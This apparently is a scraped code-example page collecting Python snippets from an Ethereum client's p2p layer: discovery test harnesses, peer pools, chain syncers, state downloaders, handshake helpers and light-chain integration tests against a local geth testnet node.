    privkey = ecies.generate_privkey()
    addr = kademlia.Address(listen_host, listen_port, listen_port)
    bootstrap_nodes = tuple(
        kademlia.Node.from_uri(enode) for enode in constants.ROPSTEN_BOOTNODES)
    discovery = DiscoveryProtocol(privkey, addr, bootstrap_nodes)
    # local_bootnodes = [
    #     kademlia.Node.from_uri('enode://0x3a514176466fa815ed481ffad09110a2d344f6c9b78c1d14afc351c3a51be33d8072e77939dc03ba44790779b7a1025baf3003f6732430e20cd9b76d953391b3@127.0.0.1:30303')]  # noqa: E501
    # discovery = DiscoveryProtocol(privkey, addr, local_bootnodes)
    loop.run_until_complete(
        loop.create_datagram_endpoint(lambda: discovery,
                                      local_addr=('0.0.0.0', listen_port)))

    async def run():
        try:
            await discovery.bootstrap()
            while True:
                await discovery.lookup_random(CancelToken("Unused"))
                print("====================================================")
                print("Random nodes: ", list(discovery.get_random_nodes(10)))
                print("====================================================")
        except OperationCancelled:
            await discovery.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, discovery.cancel_token.trigger)

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 26
0
def _test():
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    peer_pool = HardCodedNodesPeerPool(ETHPeer, chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 27
0
    def do_start(self) -> None:
        trinity_config = self.context.trinity_config
        beacon_config = trinity_config.get_app_config(BeaconAppConfig)

        db_manager = create_db_consumer_manager(trinity_config.database_ipc_path)
        base_db = db_manager.get_db()  # type: ignore
        chain_db = db_manager.get_chaindb()  # type: ignore
        chain_config = beacon_config.get_chain_config()
        chain = chain_config.beacon_chain_class(base_db)

        if self.context.args.beacon_nodekey:
            from eth_keys.datatypes import PrivateKey
            privkey = PrivateKey(bytes.fromhex(self.context.args.beacon_nodekey))
        else:
            privkey = ecies.generate_privkey()

        server = BCCServer(
            privkey=privkey,
            port=self.context.args.port,
            chain=chain,
            chaindb=chain_db,
            headerdb=None,
            base_db=base_db,
            network_id=trinity_config.network_id,
            max_peers=DEFAULT_MAX_PEERS,
            bootstrap_nodes=None,
            preferred_nodes=None,
            event_bus=self.context.event_bus,
            token=None,
        )

        syncer = BeaconChainSyncer(
            chain_db,
            server.peer_pool,
            server.cancel_token,
        )

        loop = asyncio.get_event_loop()
        asyncio.ensure_future(exit_with_service_and_endpoint(server, self.context.event_bus))
        asyncio.ensure_future(server.run())
        asyncio.ensure_future(syncer.run())
        loop.run_forever()
        loop.close()
Exemplo n.º 28
0
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import ETHPeer, HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    peer_pool = HardCodedNodesPeerPool(ETHPeer,
                                       chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey(),
                                       min_peers=5)
    asyncio.ensure_future(peer_pool.run())

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chaindb, peer_pool)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, syncer.cancel_token.trigger)

    async def run():
        try:
            await syncer.run()
        except OperationCancelled:
            pass
        await peer_pool.stop()

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 29
0
def _test() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument('-bootnode',
                        type=str,
                        help="The enode to use as bootnode")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.DEBUG
    if args.debug:
        log_level = DEBUG2_LEVEL_NUM
    logging.basicConfig(level=log_level,
                        format='%(asctime)s %(levelname)s: %(message)s')

    # Listen on a port other than 30303 so that we can test against a local geth instance
    # running on that port.
    listen_port = 30304
    privkey = ecies.generate_privkey()
    addr = kademlia.Address('127.0.0.1', listen_port, listen_port)
    if args.bootnode:
        bootstrap_nodes = tuple([kademlia.Node.from_uri(args.bootnode)])
    else:
        bootstrap_nodes = tuple(
            kademlia.Node.from_uri(enode)
            for enode in constants.ROPSTEN_BOOTNODES)

    ipc_path = Path(f"networking-{uuid.uuid4()}.ipc")
    networking_connection_config = ConnectionConfig(
        name=NETWORKING_EVENTBUS_ENDPOINT, path=ipc_path)

    async def run() -> None:
        socket = trio.socket.socket(family=trio.socket.AF_INET,
                                    type=trio.socket.SOCK_DGRAM)
        await socket.bind(('0.0.0.0', listen_port))
        async with TrioEndpoint.serve(
                networking_connection_config) as endpoint:
            service = DiscoveryService(privkey, addr, bootstrap_nodes,
                                       endpoint, socket)
            await TrioManager.run_service(service)

    trio.run(run)
Exemplo n.º 30
0
def _test():
    import signal
    from p2p import constants
    from p2p import ecies
    from p2p.exceptions import OperationCancelled

    logging.basicConfig(level=logging.DEBUG,
                        format='%(levelname)s: %(message)s')

    loop = asyncio.get_event_loop()
    loop.set_debug(True)

    listen_host = '0.0.0.0'
    # Listen on a port other than 30303 in case we want to test against a local geth instance
    # running on that port.
    listen_port = 30301
    privkey = ecies.generate_privkey()
    addr = kademlia.Address(listen_host, listen_port, listen_port)
    discovery = DiscoveryProtocol(privkey, addr, constants.MAINNET_BOOTNODES)
    # local_bootnodes = [
    #     'enode://0x3a514176466fa815ed481ffad09110a2d344f6c9b78c1d14afc351c3a51be33d8072e77939dc03ba44790779b7a1025baf3003f6732430e20cd9b76d953391b3@127.0.0.1:30303']  # noqa: E501
    # discovery = DiscoveryProtocol(privkey, addr, local_bootnodes)
    loop.run_until_complete(discovery.listen(loop))

    async def run():
        try:
            await discovery.bootstrap()
            while True:
                await discovery.lookup_random(CancelToken("Unused"))
        except OperationCancelled:
            # Give all tasks started by DiscoveryProtocol a chance to stop.
            await asyncio.sleep(2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, discovery.stop)

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 31
0
def _test():
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash', type=str, required=True, help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 32
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, FakeAsyncHeaderDB, connect_to_peers_loop)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(
        level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)

    peer_class: Type[HeaderRequestingPeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = FakeAsyncRopstenChain(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Exemplo n.º 33
0
async def test_lightchain_integration(request, event_loop):
    """Test LightChain against a local geth instance.

    This test assumes a geth/ropsten instance is listening on 127.0.0.1:30303 and serving light
    clients. In order to achieve that, simply run it with the following command line:

        $ geth -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
               -testnet -lightserv 90
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = LocalGethPeerPool(LESPeer, chaindb, ROPSTEN_NETWORK_ID, ecies.generate_privkey())
    chain = IntegrationTestLightChain(chaindb, peer_pool)
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(chain.run())
    await asyncio.sleep(0)  # Yield control to give the LightChain a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.stop())
        event_loop.run_until_complete(chain.stop())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while chaindb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)
    await asyncio.wait_for(wait_for_header_sync(n), 2)

    # https://ropsten.etherscan.io/block/11
    b = await chain.get_canonical_block_by_number(n)
    assert isinstance(b, FrontierBlock)
    assert b.number == 11
    assert encode_hex(b.hash) == (
        '0xda882aeff30f59eda9da2b3ace3023366ab9d4219b5a83cdd589347baae8678e')
    assert len(b.transactions) == 15
    assert isinstance(b.transactions[0], b.transaction_class)

    receipts = await chain.get_receipts(b.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(chain.peer_pool.peers) == 1
    head_info = chain.peer_pool.peers[0].head_info
    head = await chain.get_block_by_hash(head_info.block_hash)
    assert head.number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('95a48dca999c89e4e284930d9b9af973a7481287')
    contract_code = await chain.get_contract_code(head.hash, keccak(contract_addr))
    assert encode_hex(keccak(contract_code)) == (
        '0x1e0b2ad970b365a217c40bcf3582cbb4fcc1642d7a5dd7a82ae1e278e010123e')

    account = await chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Exemplo n.º 34
0
async def get_directly_linked_peers_without_handshake(
        peer1_class=LESPeer, peer1_chaindb=None,
        peer2_class=LESPeer, peer2_chaindb=None):
    """See get_directly_linked_peers().

    Neither the P2P handshake nor the sub-protocol handshake will be performed here.
    """
    if peer1_chaindb is None:
        peer1_chaindb = get_fresh_mainnet_chaindb()
    if peer2_chaindb is None:
        peer2_chaindb = get_fresh_mainnet_chaindb()
    peer1_private_key = ecies.generate_privkey()
    peer2_private_key = ecies.generate_privkey()
    peer1_remote = kademlia.Node(
        peer2_private_key.public_key, kademlia.Address('0.0.0.0', 0, 0))
    peer2_remote = kademlia.Node(
        peer1_private_key.public_key, kademlia.Address('0.0.0.0', 0, 0))
    initiator = auth.HandshakeInitiator(peer1_remote, peer1_private_key)
    peer2_reader = asyncio.StreamReader()
    peer1_reader = asyncio.StreamReader()
    # Link the peer1's writer to the peer2's reader, and the peer2's writer to the
    # peer1's reader.
    peer2_writer = type(
        "mock-streamwriter",
        (object,),
        {"write": peer1_reader.feed_data,
         "close": lambda: None}
    )
    peer1_writer = type(
        "mock-streamwriter",
        (object,),
        {"write": peer2_reader.feed_data,
         "close": lambda: None}
    )

    peer1, peer2 = None, None
    handshake_finished = asyncio.Event()

    async def do_handshake():
        nonlocal peer1, peer2
        aes_secret, mac_secret, egress_mac, ingress_mac = await auth._handshake(
            initiator, peer1_reader, peer1_writer)

        # Need to copy those before we pass them on to the Peer constructor because they're
        # mutable. Also, the 2nd peer's ingress/egress MACs are reversed from the first peer's.
        peer2_ingress = egress_mac.copy()
        peer2_egress = ingress_mac.copy()

        peer1 = peer1_class(
            remote=peer1_remote, privkey=peer1_private_key, reader=peer1_reader,
            writer=peer1_writer, aes_secret=aes_secret, mac_secret=mac_secret,
            egress_mac=egress_mac, ingress_mac=ingress_mac, chaindb=peer1_chaindb,
            network_id=1)

        peer2 = peer2_class(
            remote=peer2_remote, privkey=peer2_private_key, reader=peer2_reader,
            writer=peer2_writer, aes_secret=aes_secret, mac_secret=mac_secret,
            egress_mac=peer2_egress, ingress_mac=peer2_ingress, chaindb=peer2_chaindb,
            network_id=1)

        handshake_finished.set()

    asyncio.ensure_future(do_handshake())

    responder = auth.HandshakeResponder(peer2_remote, peer2_private_key)
    auth_msg = await peer2_reader.read(constants.ENCRYPTED_AUTH_MSG_LEN)

    # Can't assert return values, but checking that the decoder doesn't raise
    # any exceptions at least.
    _, _ = responder.decode_authentication(auth_msg)

    peer2_nonce = keccak(os.urandom(constants.HASH_LEN))
    auth_ack_msg = responder.create_auth_ack_message(peer2_nonce)
    auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)
    peer2_writer.write(auth_ack_ciphertext)

    await handshake_finished.wait()

    return peer1, peer2
Exemplo n.º 35
0
    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-mainnet', action="store_true")
    args = parser.parse_args()

    GENESIS_HEADER = ROPSTEN_GENESIS_HEADER
    NETWORK_ID = ROPSTEN_NETWORK_ID
    if args.mainnet:
        GENESIS_HEADER = MAINNET_GENESIS_HEADER
        NETWORK_ID = MAINNET_NETWORK_ID
    DemoLightChain = LightChain.configure(
        'RPCDemoLightChain',
        vm_configuration=MAINNET_VM_CONFIGURATION,
        network_id=NETWORK_ID,
        privkey=ecies.generate_privkey(),
    )

    chaindb = ChainDB(LevelDB(args.db))
    try:
        chaindb.get_canonical_head()
    except CanonicalHeadNotFound:
        # We're starting with a fresh DB.
        chain = DemoLightChain.from_genesis_header(chaindb, GENESIS_HEADER)
    else:
        # We're reusing an existing db.
        chain = DemoLightChain(chaindb)

    app = App(chain)
    web.run_app(app, port=8080)
Exemplo n.º 36
0
 def __init__(self, remote: kademlia.Node, privkey: datatypes.PrivateKey) -> None:
     self.remote = remote
     self.privkey = privkey
     self.ephemeral_privkey = ecies.generate_privkey()
Exemplo n.º 37
0
def _test():
    """
    Create a Peer instance connected to a local geth instance and log messages exchanged with it.

    Use the following command line to run geth:

        ./build/bin/geth -vmodule p2p=4,p2p/discv5=0,eth/*=0 \
          -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
          -testnet -lightserv 90
    """
    import argparse
    import signal
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')

    # The default remoteid can be used if you pass nodekeyhex as above to geth.
    nodekey = keys.PrivateKey(decode_hex(
        "45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8"))
    remoteid = nodekey.public_key.to_hex()
    parser = argparse.ArgumentParser()
    parser.add_argument('-remoteid', type=str, default=remoteid)
    parser.add_argument('-light', action='store_true', help="Connect as a light node")
    args = parser.parse_args()

    peer_class = ETHPeer  # type: ignore
    if args.light:
        peer_class = LESPeer  # type: ignore
    remote = Node(
        keys.PublicKey(decode_hex(args.remoteid)),
        Address('127.0.0.1', 30303, 30303))
    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    network_id = RopstenChain.network_id
    loop = asyncio.get_event_loop()
    peer = loop.run_until_complete(
        asyncio.wait_for(
            handshake(remote, ecies.generate_privkey(), peer_class, chaindb, network_id),
            HANDSHAKE_TIMEOUT))

    async def request_stuff():
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer
        block_hash = decode_hex(
            '0x59af08ab31822c992bb3dad92ddb68d820aa4c69e9560f07081fa53f1009b152')
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.sub_proto.send_get_block_headers(block_hash, 1)
            peer.sub_proto.send_get_block_bodies([block_hash])
            peer.sub_proto.send_get_receipts([block_hash])
        else:
            peer = cast(LESPeer, peer)
            request_id = 1
            peer.sub_proto.send_get_block_headers(block_hash, 1, request_id)
            peer.sub_proto.send_get_block_bodies([block_hash], request_id + 1)
            peer.sub_proto.send_get_receipts(block_hash, request_id + 2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, peer.cancel_token.trigger)

    asyncio.ensure_future(request_stuff())
    loop.run_until_complete(peer.run())
    loop.close()